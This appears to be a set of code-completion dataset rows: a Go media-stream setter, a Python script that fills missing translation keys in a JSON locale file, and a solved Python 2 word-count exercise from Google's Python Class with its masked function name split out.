func (m *Media) SetStreams(value []MediaStream)() {
m.streams = value
}
| {
m := &Media{
}
m.SetAdditionalData(make(map[string]interface{}));
return m
} |
test.py | import json
print('name : ', end = '')
b = input()
json_data = open('en-US.json', 'rt', encoding='utf-8').read()
a_json = json.loads(json_data)
json_data = open(str(b) + '.json', 'rt', encoding='utf-8').read()
b_json = json.loads(json_data)
for a_in in a_json:
if not a_in in b_json:
print(a_in + ' : ', end = '')
c = input()
b_json[a_in] = c | print(str(b_json).replace('", ', '",\n ').replace('{', '{\n ').replace('}', '\n}').replace('\'', '"')) | |
wordcount.py | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Wordcount exercise
Google's Python class
The main() below is already defined and complete. It calls print_words()
and print_top() functions which you write.
1. For the --count flag, implement a print_words(filename) function that counts
how often each word appears in the text and prints:
word1 count1
word2 count2
...
Print the above list in order sorted by word (python will sort punctuation to
come before letters -- that's fine). Store all the words as lowercase,
so 'The' and 'the' count as the same word.
2. For the --topcount flag, implement a print_top(filename) which is similar
to print_words() but which prints just the top 20 most common words sorted
so the most common word is first, then the next most common, and so on.
Use str.split() (no arguments) to split on all whitespace.
Workflow: don't build the whole program at once. Get it to an intermediate
milestone and print your data structure and sys.exit(0).
When that's working, try for the next milestone.
Optional: define a helper function to avoid code duplication inside
print_words() and print_top().
"""
import sys
# +++your code here+++
# Define print_words(filename) and print_top(filename) functions.
# You could write a helper utility function that reads a file
# and builds and returns a word/count dict for it.
# Then print_words() and print_top() can just call the utility function.
###
# This basic command line argument parsing code is provided and
# calls the print_words() and print_top() functions which you must define.
def main():
if len(sys.argv) != 3:
print 'usage: ./wordcount.py {--count | --topcount} file'
option = sys.argv[1]
filename = sys.argv[2]
if option == '--count':
print_words(filename)
elif option == '--topcount':
print_top(filename)
else:
print 'unknown option: ' + option
print 'please provide "--count" or "--topcount"'
sys.exit(1)
def prepare_dictionary(filename):
f = open(filename, 'rU')
dict = {}
for line in f:
words = line.split(' ')
for raw_word in words:
lowercase_word = raw_word.lower()
word = lowercase_word.strip()
if (word.isalpha() != True): continue
if word in dict:
dict[word] += 1
else:
dict[word] = 1
f.close()
return dict
def print_words(filename):
dict = prepare_dictionary(filename)
for word in sorted(dict):
print word + ':' + str(dict[word])
def | (filename):
dict = prepare_dictionary(filename)
def MyFn(s):
return -dict[s]
count = 0
for word in sorted(dict, key = MyFn):
print word + ':' + str(dict[word])
count += 1
if count >= 20 :
break
if __name__ == '__main__':
main()
| print_top |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.